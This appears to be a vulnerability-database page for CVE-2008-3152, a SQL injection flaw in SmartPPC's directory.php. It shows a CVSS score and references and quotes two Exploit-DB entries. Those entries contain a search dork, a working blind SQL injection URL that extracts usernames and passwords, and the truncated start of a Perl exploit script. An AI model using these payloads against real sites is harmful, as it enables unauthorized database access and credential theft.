CVE-2008-3152
published 2008-07-11
CVE-2008-3152: SQL injection vulnerability in directory.php in SmartPPC and SmartPPC Pro allows remote attackers to execute arbitrary SQL commands via the idDirectory…
Priority P340 | high | 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.05% (60.0th percentile)
SQL injection vulnerability in directory.php in SmartPPC and SmartPPC Pro allows remote attackers to execute arbitrary SQL commands via the idDirectory parameter.
No detection rules found.
Exploit-DB
SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (1)
exploitdb·2008-07-07
---
+---------------------------------------+
| Blind SQL Injection Vulnerability |
| in Pay Per Click Script |
| found by Hamtaro aka CorVu5 |
|there must be 50 ways to learn to hover|
+---------------------------------------+
#gdork: "Pay Per Click Script powered by SmartPPC.com."
#vuln: site.com/directory.php?username=&idDirectory=90992%20and%20ascii(substring((SELECT%20concat(username,0x3a,pass)%20from%20users%20limit%200,1),1,1))%3E108
#login: site.com/accounts.php
greetz Hamtaro aka CorVu5
# milw0rm.com [2008-07-07]
Exploit-DB
SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (2)
exploitdb·2008-07-07
---
#!/usr/bin/perl -W
# SmartPPC Pay Per Click Script Blind SQL Injection Exploit
# File affected: directory.php ($idDirectory)
#
# Vulnerability: Hamtaro
# Exploit: ka0x
#
#
# ka0x@domlabs:~$ ./smartppc.pl -u "http://localhost/directory.php?username=&idDirectory=2" -p Top
# [i] Getting default: -T 30
# [i] Getting default: -l 200
# [i] Getting default: -t 15
# 18 118 v
# [!] $EXIT_IF_NO_CHAR : I can't find a valid character, position 18.
# [i] USER / PASSWORD:
# ka0x / test12345_
#
# special thanks: NullWave07, an0de, Piker, Xarnuz
my $MAX_FIELD_LENGTH = 200 ;
my $EXIT_IF_NO_CHAR = 1 ;
my $DEFAULT_THREADS = 15 ;
my $DEFAULT_THREADS_TIMEOUT = 30 ;
my @ascii = ( 32 .. 123 ) ;
my $DEFAULT_THREADS_TIME = 1 ;
use LW
No writeups or analysis indexed.
http://www.securityfocus.com/bid/30111
http://www.vupen.com/english/advisories/2008/2013/references
https://exchange.xforce.ibmcloud.com/vulnerabilities/43597
https://www.exploit-db.com/exploits/6014
https://www.exploit-db.com/exploits/6019
Published: 2008-07-11